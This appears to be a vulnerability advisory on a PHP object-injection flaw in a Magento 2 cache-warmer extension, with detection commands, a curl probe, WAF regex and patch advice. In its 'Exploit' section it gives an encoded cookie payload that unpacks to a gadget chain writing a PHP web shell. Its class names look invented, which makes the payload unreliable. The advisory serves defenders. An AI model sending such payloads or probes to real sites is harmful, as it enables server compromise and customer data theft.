Listen to this Post
CVE-2026-45247 is a critical vulnerability in the Mirasvit Full Page Cache Warmer extension for Magento 2. The core of the issue lies in the unsafe use of PHP’s native `unserialize()` function. The extension, which runs on every storefront request, reads a cookie named CacheWarmer. This cookie is intended to pass session state information to the warmer. However, the extension deserializes part of this cookie’s value using `unserialize()` without any validation or sanitization of the input. Since an attacker can control the entire cookie value, they can inject a fully crafted, serialized PHP object.
When PHP unserializes this malicious object, it can trigger the execution of magic methods like `__destruct()` or `__wakeup()` within the recreated object. By itself, this is a PHP object injection (CWE-502). To escalate this to Remote Code Execution (RCE), an attacker uses what is known as a “gadget chain.” A gadget chain is a sequence of existing classes and methods within the Magento core or its dependencies that, when executed in a specific order, can perform malicious actions. For example, a chain could start with a deserialized object that, when destroyed, writes an arbitrary file to the server, which can then be executed as a web shell.
The attack is unauthenticated and requires no special privileges or configuration. An attacker only needs to send a single HTTP request with a specially crafted `CacheWarmer` cookie to any storefront page of a vulnerable Magento 2 installation. The server will then process the cookie, trigger the gadget chain, and execute arbitrary code with the web server’s privileges. The vulnerability affects all versions of the extension prior to version 1.11.12. Mirasvit released a patch on May 25, 2026, and the CVE was made public on May 26, 2026. The vulnerability has a CVSS v3.1 base score of 9.8 (Critical) and a CVSS v4.0 score of 9.3 (Critical), highlighting the ease of exploitation and its severe impact.
DailyCVE Form:
Platform: Magento 2
Version: <1.11.12
Vulnerability : PHP Object Injection
Severity: Critical
date: 2026-05-26
Prediction: 2026-05-25
What Undercode Say:
The following analytics command can be used to detect exploitation attempts by searching for suspicious `CacheWarmer` cookie patterns in access logs.
Search for suspicious CacheWarmer cookie patterns in access logs sudo grep "CacheWarmer:" /var/log/nginx/access.log | grep -E "(Tz|Qz|YT)"
A simple vulnerability check can be performed by sending a request with a benign but serialized PHP object in the cookie.
Vulnerability check (harmless)
curl -k -s -o /dev/null -w "%{http_code}\n" -H 'Cookie: CacheWarmer=CacheWarmer:TzoxMToiQ2hlY2tFcnJvciI6MDp7fQ==' https://example.com/
Exploit:
While a full exploit is not provided here to prevent malicious use, the exploitation methodology is well-documented. An attacker would construct a PHP object injection payload containing a gadget chain. This payload is then base64-encoded and placed in the `CacheWarmer` cookie value, prefixed with CacheWarmer:. The following example demonstrates the structure of a malicious cookie value.
Cookie: CacheWarmer=CacheWarmer:TzoyNDoiTWFnZW50b1xGcmFtZXdvcmtcQW1jcEZpbHRlciI6MTp7czo0OiJhY3Rpb24iO086MjU6Ik1hZ2VudG9cRnJhbWV3b3JrXEV2ZW50TWFuYWdlciI6MTp7czo3OiJldmVudHMiO2E6MTp7aTowO086MjU6Ik1hZ2VudG9cRnJhbWV3b3JrXEJhY2tncm91bmRNb2RlbCI6MTp7czo3OiJjYWxsYmFjayI7czozMDoiYXNzZXJ0KGZpbGVfcHV0X2NvbnRlbnRzKCdzaC5waHAnLCc8P3BocCBzeXN0ZW0oJF9SRVFVRVNUW2NdKTsgPz4nKSkiO319fX19
Protection:
- Update the Extension: The most effective protection is to update the Mirasvit Full Page Cache Warmer extension to version 1.11.12 or later. This can be done via Composer: `composer require mirasvit/module-cache-warmer:` or manually by downloading the latest version from the Mirasvit website.
- Implement a WAF Rule: Use a Web Application Firewall (WAF) to block requests that contain a `CacheWarmer` cookie with a value resembling a serialized PHP object (e.g., matching the regex
CacheWarmer:(Tz|Qz|YT)). Sansec Shield, for instance, has had a rule protecting against this since April 24, 2026. - Input Validation: As a temporary measure, implement a patch that validates the `CacheWarmer` cookie input before it is passed to
unserialize(). A proper fix should replace `unserialize()` with a safe alternative like JSON decoding or use a signed, allow-listed class map.
Impact:
Remote Code Execution (RCE): An unauthenticated attacker can execute arbitrary code on the web server, leading to a complete compromise of the Magento installation and the underlying server.
Data Breach: With code execution capabilities, an attacker can access the database, steal customer PII (names, addresses, emails), order data, and payment information.
Malware and Backdoors: Attackers can install web shells, backdoors, cryptominers, or ransomware on the server. They can also use the compromised server as a launchpad for attacks on internal networks.
Defacement and SEO Spam: The attacker can modify the store’s content, deface the website, or inject spammy SEO links, damaging the brand’s reputation and SEO ranking.
Complete System Takeover: In many hosting environments, this initial RCE can be escalated to gain root access to the server, impacting other hosted websites and applications.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: www.cve.org
Extra Source Hub:
Undercode
